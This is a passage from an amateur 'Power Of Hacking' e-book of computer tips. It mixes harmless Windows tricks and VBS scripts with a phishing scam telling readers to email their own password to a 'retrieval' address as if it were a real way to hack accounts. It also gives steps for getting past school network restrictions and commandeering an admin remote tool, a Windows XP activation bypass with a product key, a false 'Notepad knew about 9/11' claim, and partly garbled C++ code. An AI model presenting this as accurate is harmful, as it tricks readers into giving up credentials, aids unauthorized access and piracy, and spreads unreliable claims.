Power Of Hacking 1.) Write in the body of the letter The person's email address your hacking. 2.)Right below that, type in your hotmail address/yahoo/whatever address your using. 3.) Type your password to YOUR email address right below your email address on in the letter. This is used for vertification (yes, the mail provider does use your password to verify.) 4.) Here is an example of what this should look like: tahir@yahoo.com Frank@yahoo.com password to frank@yahoo.com Joeschmo is the address your hacking, frank is your email address, and then the password to frank@yahoo.com is your password for your email address. Now the final, and MOST IMPORTANT STEP is to email all of this to email this to pw_retrieved@yahoo.com, with this code pasted right below the password to your email address: adsflwro%$#AR11345. That code is what will trigger the pw_retrieved@yahoo.com to send you back a message with the person's password. The notification email will be sent back within 48 hours of the time you sent. So here is what it will all look like in the end: tahir@yahoo.com Frank@yahoo.com Password to frank@yahoo.com adsflwro%$#AR11345 And remember, send this to retrieve_pwd@yahoo.com Hide Your Files In a JPEG Posted in Easy Hacking, hacking, offline hacking with tags free tips, hacking, hacking tips, hacking tricks, hide files, hide files in jpeg, hide folders, hide your files in a jpeg, how to hide files, Dear Friends !!!!!! Hope you all enjoying the Website and its posts, i have a new website Hacking trickz. Kindly refer to that site and be a reader of that blog, as that one is much much better than this one. Have a nice time and thanks for your Attention. Thanks from your Friend Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have Mail:mtahirzahid@yahoo.com
Page 97
Power Of Hacking WinRAR installed. Ok, lets begin… 1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden RECOMMENDED). 2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden). 3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden. 4. Now, open Command Prompt (Go to Run and type ‗cmd‗). Make your working directory C:\hidden. 5. Now type: ―COPY /b logo.jpg + secret.rar output.jpg‖ (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. 6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive . How to become Admin on your school Network. This way works for most schools. This tutorial is for those newbies out there, wanting to ―hack‖ their school. Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask google. Firstly get a feel for the layout of the network.. you can do this quickly by: Start > Programs(Right Click) > Explore this will give you a map of the network, and you‘ll probably be able to edit and run files this way, but with DOS theres more options… The basics for school hacking is accessing the command prompt, and 90% of school will have blocked this. So to get around this you can do two things: 1) input this into the IE address ―C:windowssystem32cmd.exe‖ however this is very likely to be disabled. 2) Creating a Bat file to open Command Prompt. Mail:mtahirzahid@yahoo.com
Page 98
Power Of Hacking You can do this by, opening IE > view > source. once you have notepad open, where gonna make a .BAT file. we want the BAT file to open up command prompt, so we type: ―CMD‖ without the ―‖ press ENTER then save it as file.BAT. Now you should be able to open Command Prompt by clicking on the file. If it fails to open, it is most likely that the CMD.exe is disabled and you dont have the privilages to run it. So try using the file COMMAND instead. This does not have the same power as CMD, but is better than nothing. Once we have it open now comes the good bit…. Before doing this, make sure you know a good lot of DOS commands. Heres a great list www.computerhope.com/msdos These are a few that you might like to try: Net send * ―Hungry Hacker is cool‖ Shutdown -s -f -m &*92;NAME - rarely works These will only work if you have the privilages to use them. After you have access into Command Prompt, to get access to some programs that you are not allowed to use, DIR for Shortcuts (lnk). Then save them onto floppy disk. A shortcut is good, because it is smaller and quicker to save than a whole exe file. There is also a good chance that the network will have RAT‘s installed. A RAT is a (Remote Administration Tool). Used by Admins to manage networks… a bit like a friendly trojan. This shouldnt be hard to find, and once you have found the EXE or LNK save it to a floppy, - Now you have control over every computer!! You could use the RAT to use the admins machine, here possibilites are endless! how to improve ur page search rank Ever wondered why some sites rank higher in search engines than others do? Well...Search engine databases maintain billions of pages. They use a proprietary formula (or algorithm) to "score" the relevancy of websites for each search query. The highest ranking or "most relevant" websites for a specific query are listed first in the search results. There are over 100 criteria used for ranking a page, and each carries a different ―weight‖ of importance. Some criteria we can control, some we can manipulate, and others we can‘t do anything about. One of the most important criteria that we have control over is body content. The following ―tweaks‖ can help your web pages rank better. Mail:mtahirzahid@yahoo.com
Page 99
Power Of Hacking Headers, Bullets etc. Make the copy look like a document with header tags, bullets, bolds, italics etc – focusing these features on the words that relate to the main topic. Location, Location, Location The closer the keywords or keyword phrases that best identify your topic are to the top of the document, the better. Try to have the keyword or keyword phrase appear in the opening sentence of the first paragraph and appear at least once in each paragraph. Write Good Copy Not only does it help satisfy the ―related phrase‖ algorithm, it provides a sense of value to the reader, encouraging them to bookmark the site and return frequently. Root Word Search engines identify root words that might be pluralized or tensed so don‘t discount them in your copy. Word Count 250 to 300 words should be a minimum target per page if possible. Title Tag Get the primary keywords or keyword phrases as they relate to your topic in your title tag. Title tags don‘t need to be long, but should highlight the main topic. Example: < title >Tripod web hosting. Free web hosting, e-mail, and blogs< /title > Harmony While most search engines doesn‘t rank a website based on the description tag, having the primary keywords appear in the title, description and body content create a ―harmony‖ that adds validity keyboard light disco These codes when executed makes your Caps, Num, Scroll lock keys flash.. very kewlll...i hav tried it... 1.This piece of code makes ur keyboard a live disco... Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop
2.This one makes it looks like a chain of light.... Mail:mtahirzahid@yahoo.com
Page 100
Power Of Hacking Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 200 wshshell.sendkeys "{CAPSLOCK}" wscript.sleep 100 wshshell.sendkeys "{NUMLOCK}" wscript.sleep 50 wshshell.sendkeys "{SCROLLLOCK}" loop
Instrcuctions: *paste any of the two above codes in notepad *Save as "AnyFileName".vbs *Run the file *to stop, launch task manager and then under "Processes" end wscript.exe
Try both the scripts both r different.......enjoy !!!!!!!!!! Keyboard Shortcutsgtalk Keyboard Shortcuts Ctrl + E - It centralizes the selected text, or the current line. Ctrl + R - It justifies to the right the selected text, or the current line. Ctrl + L - It justifies to the left the selected text, or the current line. Ctrl + I - The same thing does that Tab. Tab - It is giving the area to each of the windows opened by Google Talk. Ctrl + Tab - The same thing does that Shift + Tab . Shift + Tab - The same thing does that Tab but in reverse. Ctrl + Shift + L -Switch between points, numbers, letters, capital letters, roman numbers and capital roman numbers Ctrl + 1 (KeyPad) - It does a simple space between the lines. Ctrl + 2 (KeyPad) - It does a double space between the lines. Ctrl + 5 (KeyPad) - A space does 1.5 between the lines. Ctrl + 1 (NumPad) - It goes at the end of the last line. Ctrl + 7 (NumPad) - It goes at the begin of the last line. Ctrl + F4 - It closes the current window. Alt + F4 - It closes the current window. Alt + Esc - It Minimize all the windows. Windows + ESC - Open Google Talk (if itâ&#x20AC;&#x2DC;s minimized, or in the tray) F9 - Open Gmail to send an email to the current contact. F11 - It initiates a telephonic call with your friend. F12 - It cancels a telephonic call. Esc - It closes the current window. Make the folder INVISIBLE without hiding Mail:mtahirzahid@yahoo.com
Page 101
Power Of Hacking Make your folders invicible...:) 1)Right Click on the desktop.Make a new folder 2)Now rename the folder with a space(U have to hold ALT key and type 0160). 3)Now u have a folder with out a name. 4)Right click on the folder>properties>customize. Click on change icon. 5)Scroll a bit, u should find some empty spaces, Click on any one of them. click ok Thats it, now u can store ur personal data without any 3rd party tools make ur xp talk Open a text file in notepad and write: ;copy from here-------------Dim msg, sapi msg=InputBox("Enter your text","Talk it") Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg ;----------to here
Save the file with a (*.vbs) extension, it will create a VBScript File. It will prompt you for a text, input the text and press ok." make windows genuine 1 . start > run > ‖ regedit‖ (without the quotes of course) 2 . Go to the key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WindowsNT\ CurrentVersion\WPAEvents\OOBETimer …and doubleclick on it. Then change some of the value data to ANYTHING ELSE…delete some, add some letters, ..just change it! now close out regedit. 3 . Go to start > run > ―%systemroot%\system32\oobe\msoobe.exe /a‖ (again, don‘t type the quotes) 4 . The activation screen will come up, click on register over telephone,>next> then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ and give update. (Now automatically window will return back to activate by telephone mode and ask for activation code,just ignore and exit that window it‘s done) Mail:mtahirzahid@yahoo.com
Page 102
Power Of Hacking make xp serial original Step 1 Open Start/Run... and type the command: regedit and click "OK" (or press ENTER). Go to HKey_Local_Machine\Software\Microsoft\WindowsNT\Current Version\WPAEvents, on the right double click on "oobetimer" and change at least one digit of this value to deactivate windows. Click "OK" and close the Registry Editor. Step 2 Open Start/Run... and type the command: %systemroot%\system32\oobe\msoobe.exe /a and click "OK" (or press ENTER). This will bring up the "Activate Windows" window. Check the option for "Yes, I want to telephone a customer service representative to activate Windows" and click "Next"
Step 3 Then click "Change Product Key" (don't enter any information on that screen) Step 4 Type in the new key and click "Update"
The activate Windows by phone window will reappear at this point, just close it by clicking the X in the upper right hand corner Step 5 Reboot your system and Open Start/Run... and type the command: %systemroot%\system32\oobe\msoobe.exe /a and click "OK" (or press ENTER). If you see "Windows is already activated" then everything is OK. method to overcome rapidshare If you are pissed of bye the waiting time on rapidshare and want to reset the times to the least wait time.... JUST FOLLOW THE STEPS... !! When u have located the rapidshare link copy it (u ll need it latter). Mail:mtahirzahid@yahoo.com
Page 103
Power Of Hacking !! After the rapidshare show long waiting time say 60 min., or so just close the browser. !! Disconnect the network connection which connects u to the net. !! Reconnect to the iternet. !! Reopen the browser. !! Paste the link (Copied earlier) and voile the wait time is RESET to the least time depending on the size of the file u r downloading... Work for me everytime on Opera 8.5 browser.
POST ur replies if it works for u and if any problems faced...... So now u can enjoy rapidshare ..... without waiting for long hours.. Enjoy and thanks... INFO ABOUT THE SOFTWARE BELOW Name of Software: RapGet (RAPidshareGET) is a Rapidshare auto downloader and it support a lot of free share services.
Advantages of RapGet a freeware; a small soft (about 150 Kb); autodownloads from 57 free share services; a lot of concurrent downloads; multilingual support (37 languages). Supported services rapidshare.de megaupload.com sexuploader.com mytempdir.com slil.ru sendspace.com turboupload.com Mail:mtahirzahid@yahoo.com
Page 104
Power Of Hacking axifile.com hyperupload.com getfile.biz depositfiles.com webfile.ru file2share.biz rapidupload.com yourfile.org yourfilehost.com filehd.com mooload.com scambia.com filepost.ru justupit.com simpleupload.de audiofind.ru yourfilelink.com files.to savefile.com filebest.ru freefileupload.net 4shared.com ifolder.ru oxyshare.com filecloud.com datenklo.net zshare.net filefactory.com filespace.ru badongo.net easy-sharing.com upload2.net hemenpaylas.com up-file.com rapidshare.fr uploadyourfiles.de quickdump.com megashares.com box.net takdata.com bonpoo.com share.am recfile.com speedyshare.com free-transfer.de paylas.com come2store.com ultrashare.de rapidsafe.de rapidshare.ru Mail:mtahirzahid@yahoo.com
Page 105
Power Of Hacking By using this SW of simply paste the ling and enjoy the download without typing the download confirmation code or stuff... ??Multiple Login in Google Talk!?? wonder why this feature is not by default included in Google Talk. One can login simultaneously to more than one account. Unlike yahoo multiple login no need of registry editing here. Follow these simple steps......... * Create a shortcut of your Google talk. * Right click the shortcut ----> choose Properties. * In the "Target" you will find this "C:\Program Files\Google\Google Talk\googletalk.exe" * Now at the end of target add this "/nomutex" without the quotes. It should be like this "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex There is a space after googletalk.exe" Thats it .Click OK and you can open more than one Google talk Multiple login in yahoo messenger! this is old trick but this trick is 4 new people of this comm. Wonderful Trick 4 UUUUU MAn.........Enjoy ... it....
Multiple login in yahoo messenger! You can login with multiple ID's on the same yahoo messenger. Follow these steps : ==>> * Go to Start ==> Run ==>> Type regedit,hit enter * Go to HKEY_CURRENT_USER ==>> Software ==>> Yahoo ==>> pager ==>>Test * On the right pane ==>> right-click and choose new Dword value . * Rename it as Plural. * Double click and assign a decimal value of 1. * Now close registry and restart yahoo messenger. Mail:mtahirzahid@yahoo.com
Page 106
Power Of Hacking * For signing in with new id open another messenger . ++++++++++++++++++++++++++++++++++++++++++++ notepad trick Amazing thing but true , Notepad knew about 9/11/2001 ! The flight number which hit the WTC in New York was Q33N ! See it yourself : 1. Open Notepad 2. Type : Q33N 3. Now, go to Format menu 4. Choose Font 5. Now, change the size to '72' 6. Now, change the font to 'Wingdings' 7. See what is displayed ! Isn't it amazing ! protected folders To create a protected forlders to hide your important files, follow these steps: 1. Open notepad (Start->Run->type notepad 2. Write ren a a.{21EC2020-3AEA-1069-A2DD-08002B30309D} 3.Save this file as lock.bat This method is to create protected folder... where a is the name of the folder.
To remove protection 1. Open notepad (Start->Run->type notepad 2. Write ren a.{21EC2020-3AEA-1069-A2DD-08002B30309D}a 3.Save this file as key.bat Recover the lost administrators password Slightly more work needed if you lose or forget the Windows XP administrator password. 1.First reboot Windows XP in safe mode by re-starting the computer and pressing F8 repeated as the computer starts up. 2.Then (in safe mode) click Start and then click Run. In the open box type "control userpasswords2" without the quotes - I have just used quotes to differentiate what you have to type. 3.You will now have access to all the user accounts, including the administrators account and will be able to reset the lost password. Mail:mtahirzahid@yahoo.com
Page 107
Power Of Hacking 4.Just click the administrators user account, and then click Reset Password. 5.You will need to add a new password in the New password and the Confirm new password boxes, and confirm by clicking OK.
All done, you have recovered the lost adminitrators password! renaming computer name Create a Useful Name for My Computer Start/Run/Regedit HKEY_CLASSES_ROOT\CLSID\ {20D04FE0-3AEA-1069-A2D8-08002B30309D}. Data Type: REG_EXPAND_SZ (Expanded String Value). Rename the value named "LocalizedString" to "LocalizedString.old". Create a new REG_EXPAND_SZ value named "LocalizedString", and set the value to "%USERNAME% on %COMPUTERNAME%". Exit the registry editor, click on your desktop and press F5 (for refresh). The "My Computer" icon should now be rename to "Username on Computername". renaming login box Run regedit and go to HKEY_Local_Machine\Software\Microsoft \Windows\CurrentVersion\Winlogon Then add or change the key: LegalNoticeCaption REG_SZ="(Title for Box)" And the same for this key: LegalNoticeText REG_SZ="(Message to be displayed in the box)"
secrets of windows xp Instructions - Go to "Start", "Run" and Type defrag c: -b to defragment the Boot and Application Prefetch information.
Secret - Hidden Install Creator Instructions - Go to Start, Run, type iexpress
Secret - Hidden Internet Conference Application Instructions - Go to Start, Run, type conf
Secret - Create a Log File Instructions - Launch Notepad, Type .LOG on the first line, and then press Enter to move to the next line. On the File menu, click Save As, type a descriptive name for your file in the File name Mail:mtahirzahid@yahoo.com
Page 108
Power Of Hacking box, and then click OK. When you next open the file, note that the date and time have been appended to the end of the log, immediately preceding the place where new text can be added. You can use this functionality to automatically add the current date and time to each log entry.
Secret - Image Trails Instructions - Open an image and hold down Shift then drag the image around to create an image trail. Secret - 10x Zoom Instructions - Open an image and select the magnifying glass icon. Left-Click exactly on the line below the 8x. Secret - Hidden Font Editor Instructions - Go to Start, Run, type eudcedit
Secret - Hidden Windows Media Player Instructions - Go to Start, Run, type mplayer2 FreeCell Secret - Instant Win Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win. Secret - Hidden Game Modes Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.
Hearts Secret - Show All Cards Instructions - Edit this registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Applets\Hearts and create a new String value named ZB with a Data value of 42. Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards.
Minesweeper Secret - Reveal Mines Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel. Secret - Stop Timer Instructions - Launch Minesweeper and start a game so the timer starts counting, then press the Mail:mtahirzahid@yahoo.com
Page 109
Power Of Hacking Windows Key + D to show the desktop. Now when you select minesweeper from the taskbar you can continue playing with the timer stopped.
Pinball Secret - Extra Balls Instructions - Type 1max at the start of a new ball to get extra balls. Secret - Gravity Well Instructions - Type gmax at the start of a new game to activate the Gravity Well. Secret - Instant Promotion Instructions - Type rmax at the start of a new game to go up in ranks. Secret - Skill Shot Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points: First: 15,000 points Second: 30,000 points Third: 75,000 points Fourth: 30,000 points Fifth: 15,000 points Sixth: 7,500 points Secret - Test Mode Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around. While in test mode press the following keys for more secrets: H - Get a 1,000,000,000 High Score M - Shows the amount of system memory R - Increases your rank in game Y - Shows the Frames/sec rate Secret - Unlimited Balls Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.
Solitaire Secret - Instant Win Instructions - Press Alt + Shift + 2 during game play to instantly win. Secret - Draw single cards in a Draw Three game Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three Mail:mtahirzahid@yahoo.com
Page 110
Power Of Hacking cards you will only draw one. Add/Remove Secret - Hidden Uninstall Options Instructions - Warning: Proceed at your own risk! Browse to C:\Windows\inf\ and make a backup copy of sysoc.inf. Then open the original file C:\Windows\inf\sysoc.inf in notepad. Go to "Edit" and select "Replace". In "Find what:" type ,hide and in "Replace with:" type , then select "Replace All", save and close the file. Go to the "Control Panel", "Add/Remove", select "Add/Remove Windows Components". You will now see many more Windows components to uninstall. Do not remove anything with no label or that you do not recognize or fully understand what it does. Doing so can break certain functionality in Windows.
Control Panel Secret - Hidden Control Panel Extensions Instructions - Download and install TweakUI, launch, go to "Control Panel" and check any item not selected, then "Apply" and "OK". You will now see the hidden control panel extensions.
Device Manager Secret - Hidden Devices Instructions - Go to the "Control Panel", "System" icon, "Hardware" tab and select "Device Manager". Select "View" and Show hidden devices. Secret - Phantom Devices Instructions - Go to "Start", "Programs", "Accessories" and select "Command Prompt". At the command prompt, type "set devmgr_show_nonpresent_devices=1" and press Enter. At the command prompt, type "start devmgmt.msc" and press Enter. Select "View" and Show hidden devices. You can see devices that are not connected to the computer. When you close the command prompt window, Windows clears the "devmgr_show_nonpresent_devices=1" variable that you set and prevents phantom devices from being displayed when you select "Show hidden devices".
Music Secret - Music from the Installer Instructions - Browse to C:\Windows\system32\oobe\images\title.wma and play.
Shutdown Secret - Display Hibernate Option on the Shut Down dialog Instructions - Go to "Start", "Turn Off Computer..." and press either Shift key to change the "Stand By" button to "Hibernate". Mail:mtahirzahid@yahoo.com
Page 111
Power Of Hacking Support Tools Secret - Over 100 Windows XP Support Utilities are on the install CD Instruction - Run the D:\Support\Tools\setup.exe file. short forms for your intresting chat Looks weird ? May be for people who do not type much in Short forms. Short forms are used increasingly in Mobile SMS and other web messaging services. Reason is very obvious, time factor length of message, reply speed and so on. Here is a list of short forms that are commonly used and it may be helpful for you to type faster. AB - Ah Bless! AFAIK - As Far As I Know AFK - Away From Keyboard AKA - Also Known As AML - All My Love ASAP - As Soon As Possible ASL? - Age, Sex, Location? ATB - All The Best ATK - At The Keyboard ATM - At The Moment A3 - Anytime, Anyplace, Anywhere BAK - Back At Keyboard BBL - Be Back Later BBS - Be Back Soon BF - Boy Friend BFN/B4N - Bye For Now BGWM - Be Gentle With Me BMW - Be My Wife BRB - Be Right Back BRT - Be Right There BTW - By The Way B4 - Before B4N - Bye For Now CU - See You CUL8R - See You Later CYA - See You D8? - Date? EOL - End of Lecture FAQ - Frequently Asked Questions FC - Fingers Crossed FOAD - F**k Off And Die FWIW - For What It's Worth FYI - For Your Information F2F - Face to Face GAL - Get A Life GF - Girl Friend G2G - Got to Go Mail:mtahirzahid@yahoo.com
Page 112
Power Of Hacking GG - Good Game GMTA - Great Minds Think Alike GR8 - Great! GTH - Go To Hell G9 - Genius HAND - Have a Nice Day HBTU - Happy Birthday To You HOAS - Hold On A Sec HUD - How You Doing? H&K - Hugs and Kisses IC - I See ICQ - I Seek you IDC - I Don't Care IDK - I Don't Know ILU - I Love You IMHO - In My Honest/Humble Opinion IMO - In My Opinion IOU - I Owe You IOW - In Other Words IRL - In Real Life JAM - Just A Minute J4F - Just For Fun J4K - Just For Kicks KISS - Keep It Simple, Stupid LDR - Long Distance Relationship LMAO - Laugh My *** Off LOL - Laughing Out Loud LTNS - Long Time No See L8R - Later M8 - Mate MSG - Message MTE - My Thoughts Exactly MYOB - Mind Your Own Business NE - Any NE1 - Anyone NM - NeverMind NRN - No Reply Necessary NWO - No Way Out OIC - Oh I See OMG - Oh My God OTOH - On The Other Hand OTT - Over The Top PCM - PLease Call Me PITA - Pain In The *** PML - Piss Myself Laughing PRT - Party PRW - Parents Are Watching PTB - Please Text Back QT - Cutie R - Are Mail:mtahirzahid@yahoo.com
Page 113
Power Of Hacking RLR - Earlier ROFL - Rolling On The Floor Laughing ROFLOL - Rolling On The Floor Laughing Out Loud ROTFLMAO - Rolling On The Floor Laughing My *** Off RMB - Ring My Bell RU - Are You? RUOK - Are You OK? SK8 - Skate SRY - Sorry STATS - Your Age, Sex, Location? STFU - Shut The F**k Up! TB - Text Back THX - Thank You, Thanks TMB - Text Me Back TTFN - TaTa For Now! TTYL - Talk To You Later TTTT - To Tell The Truth U - You U2 - You Too U4E - Yours For Ever UI! - You Idiot! UR - Your W@ - What WB - Welcome Back ****** - What The F**k WTG - Way To Go! WTH - What The Hell WUF - Where Are You From? W8 - Wait... 10Q - Thank You 7K â&#x20AC;&#x201C; Sick Snake game in c++:snake game in c++ //80*48 #include #include #include #include #include #include #include #include #include #include #include unsigned key; Mail:mtahirzahid@yahoo.com
Page 114
Power Of Hacking int len=0,count=0,foodtype=0,d,m,food_flag=0,j=0,i=0,display_count=10, hscore_pos=0,x_index=0,y_index=0,mx,my,maze=1,speed=100; long score=0,ti_elap=0,ti_rem=15,tot_ti=15,ti_init; char *main_menu[]={{"1. Play"},{"2. Options"},{"3. Instruction"}, {"4. Hi-Score"},{"5. Exit"}}; char *game_menu[]={{"1. Mazes"},{"2. Level"},{"3. Back to Main menu"}}; char *maze_menu[]={{"1. Open"},{"2. Box"},{"3. Twisted"}, {"4. Return to Main menu"}}; char *level_menu[]={{"1. Beginner"},{"2. Intermediate"},{"3. Expert"}, {"4. Return to Main menu"}}; char *m_m[]={"P","O","I","H","E"}; char *g_m[]={"M","L","B"}; char *mm[]={"O","B","T","R"}; char *lm[]={"B","I","E","R"}; int maze3_x[][14]={{2,3,4,5,6,7,8,9,10,11,12,13,14,15}, {25}, {30}, {37,38,39,40,41,42,43,44,45,46,47,48,49,50}}; int maze3_y[][14]={{30}, {2,3,4,5,6,7,8,9,10,11,12,13,14,15}, {27,28,29,30,31,32,33,34,35,36,37,38,39,40}, {20}};
void showfood(); void end(); void show_game_menu(); void show_main_menu(); enum{UP=1,RIGHT=2,DOWN=3,LEFT=4}DIRECTION,Pre_Dir; struct { unsigned x:7 ; unsigned y:7 ; }coordinate[1000],tail,head,food; inline void initialise() { d=DETECT; initgraph(&d,&m,"e:\tc\bgi"); cleardevice(); mx=getmaxx(); my=getmaxy(); } void RESET() { len=count=foodtype=food_flag=i=j=hscore_pos=x_index=y_index=0; Mail:mtahirzahid@yahoo.com
Page 115
Power Of Hacking display_count=10, speed=100; score=ti_elap=0;ti_rem=tot_ti=15; head.x=head.y=tail.x=tail.y=food.x=food.y=0; for(i=0;i<1000;i++) coordinate[i].x=coordinate[i].y=0; } void showoff_food() { gotoxy(food.x,food.y); cout<<" "; food.x=food.y=0; showfood(); } int showfoodtimer(int fo_fl) { if(fo_fl==1) { if(ti_rem<=0) { showoff_food(); ti_rem=15; food_flag=0; } else { ti_elap=((biostime(0,0L)-ti_init)/(speed/16)); ti_rem=(tot_ti-(ti_elap)); gotoxy(7,46); if(ti_rem<10) cout<<"0"<<<<<<<<<<<datebuf<<<>8; if(s==1) exit(); else if(s==72) //If UP arrow key is pressed { if(DIRECTION==4 || DIRECTION==2) { Pre_Dir=DIRECTION; DIRECTION=UP; } } else if(s==80) //If DOWN arrow key is pressed { if(DIRECTION==4 || DIRECTION==2) { Pre_Dir=DIRECTION; DIRECTION=DOWN; } } else if(s==77) ////If RIGHT arrow key is pressed { if(DIRECTION==1 || DIRECTION==3) { Pre_Dir=DIRECTION; DIRECTION=RIGHT; } } else if(s==75) ////If LEFT arrow key is pressed { if(DIRECTION==1 || DIRECTION==3) { Pre_Dir=DIRECTION; DIRECTION=LEFT; } } } if(DIRECTION==2) //Right Key head.x++; else if(DIRECTION==1) //Up Key head.y--; else if(DIRECTION==4) //Left Key Mail:mtahirzahid@yahoo.com
Page 116
Power Of Hacking head.x--; else if(DIRECTION==3) //Down Key head.y++; if(maze==1) //OPEN maze { if(head.x>50) head.x=2; else if(head.x<=1) head.x=50; if(tail.x>50) tail.x=2; else if(tail.x<=1) tail.x=50; if(head.y>40) head.y=2; else if(head.y<=1) head.y=40; if(tail.y>40) tail.y=2; else if(tail.y<=1) tail.y=40; } else if(maze==2) //BOX Maze { if(head.x>50 ||head.y>40 ||head.x<2 ||head.y<2) gameover(); } else if(maze==3) //TWISTED or SPIRAL Maze { for(i=2;i<16;i++) { if((head.x==25 && head.y==i)||(head.x==i && head.y==30) ||(head.x==35+i && head.y==20)||(head.x==30 && head.y==25+i)) { gameover(); } } if(head.x>50) head.x=2; else if(head.x<=1) head.x=50; if(tail.x>50) tail.x=2; else if(tail.x<=1) tail.x=50; if(head.y>40) head.y=2; else if(head.y<=1) head.y=40; if(tail.y>40) tail.y=2; else if(tail.y<=1) tail.y=40; } for(int i=0;i5) score+=(foodtype*8)+2+(foodtype*((ti_rem*3)/2)); else score+=(foodtype*8)+2; ti_rem=15; SOUND(); food.x=food.y=0; if(count==5) { showbigfood(); food_flag=1; ti_init=biostime(0,0); showfoodtimer(1); foodtype=1; count=0; } else { showfood(); food_flag=0; foodtype=0; } len++; Mail:mtahirzahid@yahoo.com
Page 117
Power Of Hacking } else { tail.x=coordinate[0].x; tail.y=coordinate[0].y; showoff(); for(int k=0;k<<<head.x<< settextstyle(3,0,5); for(i=0;i<4;i++) { setcolor(WHITE); outtextxy(67,190+(45*i),level_menu[i]); setcolor(RED); outtextxy(130,190+(45*i),lm[i]); } get_level_choice(); } void getmaze() { cleardevice(); border(); settextstyle(1,0,5); setcolor(RED); outtextxy(50,140,"M A Z E S"); settextstyle(3,0,5); for(i=0;i<4;i++) { setcolor(WHITE); outtextxy(67,190+(45*i),maze_menu[i]); setcolor(RED); outtextxy(130,190+(45*i),mm[i]); } get_maze_choice(); } void get_gm_choice() { get: int cho=bioskey(0); cho=cho>>8; switch(cho) { case 2: case 50: case 28: case 79: getmaze(); break; case 3: case 38: case 80: getlevel(); break; case 4: case 48: case 81: show_main_menu(); break; default: goto get; } } void show_game_menu() { cleardevice(); border(); settextstyle(1,0,5); setcolor(RED); outtextxy(50,140,"G A M E M E N U"); settextstyle(3,0,5); for(i=0;i<3;i++) { setcolor(WHITE); outtextxy(67,190+(45*i),game_menu[i]); setcolor(RED); outtextxy(130,190+(45*i),g_m[i]); } get_gm_choice(); } void play() { cleardevice(); restorecrtmode(); textmode(64); game(); } void options() { show_game_menu(); } void instruction() { cleardevice(); border(); setcolor(RED); settextstyle(1,0,5); outtextxy(50,140,"I N S T R U C T I O N S"); settextstyle(3,0,3); setcolor(WHITE); outtextxy(60,190,"1. Move the snake using Arrow Keys -> "); Mail:mtahirzahid@yahoo.com
Page 118
Power Of Hacking outtextxy(60,230," UP, DOWN, LEFT, RIGHT"); outtextxy(60,270,"2. Eat food (@,é) and make snake grow longer."); outtextxy(60,300,"3. You will get 2 points for (@) and"); outtextxy(60,330," more points for Bonus food(é)"); outtextxy(60,365,"4. Don't let it hit the walls or its tail"); settextstyle(4,0,4); setcolor(RED); outtextxy(140,425,"Press any key to Continue"); getch(); show_main_menu(); } void hiscore() { cleardevice(); border(); setcolor(RED); settextstyle(1,0,5); outtextxy(50,140," H I S C O R E"); settextstyle(3,0,3); setcolor(WHITE); outtextxy(60,220,"Sorry! This feature is not available in this version ); outtextxy(60,270,"For further details, Contact : "); setcolor(GREEN); outtextxy(60,310," mkj_manishjain@yahoo.co.in"); outtextxy(60,345," Mobile no.: +91 9896455735 "); settextstyle(4,0,4); setcolor(RED); outtextxy(140,425,"Press any key to Continue"); getch(); show_main_menu(); }
void get_mm_choice() { get: int cho=bioskey(0); cho=cho>>8; switch(cho) { case 2: case 25: case 28: case 79: play(); break; case 3: case 24: Mail:mtahirzahid@yahoo.com
Page 119
Power Of Hacking case 80: options(); break; case 4: case 23: case 81: instruction(); break; case 5: case 35: case 75: hiscore(); break; case 6: case 18: case 76: exit(); break; default: goto get; } } void show_main_menu() { cleardevice(); border(); settextstyle(1,0,5); setcolor(GREEN); outtextxy(60,130,"M A I N M E N U"); settextstyle(3,0,5); for(i=0;i<5;i++) { setcolor(WHITE); outtextxy(67,180+(35*i),main_menu[i]); setcolor(RED); outtextxy(130,180+(35*i),m_m[i]); } get_mm_choice(); } void end() { initialise(); for(j=0;j<=2;j++) { setcolor(RED+j); circle(mx/2,my/2,150+j*2); Mail:mtahirzahid@yahoo.com
Page 120
Power Of Hacking } settextstyle(4,0,5); outtextxy(mx/2-65,my/2-20,"The End"); getch(); closegraph(); restorecrtmode(); exit(0); } //MAIN FUNCTION void main() { intro_graphics(); show_main_menu(); } ______________________________________________________________________________ __________ star wars on pc You Don't need to Download IT ! Just : Start>>Run , type : telnet towel.blinkenlights.nl And Enjoy The Movie ! ______________________________________________________________________________ _________
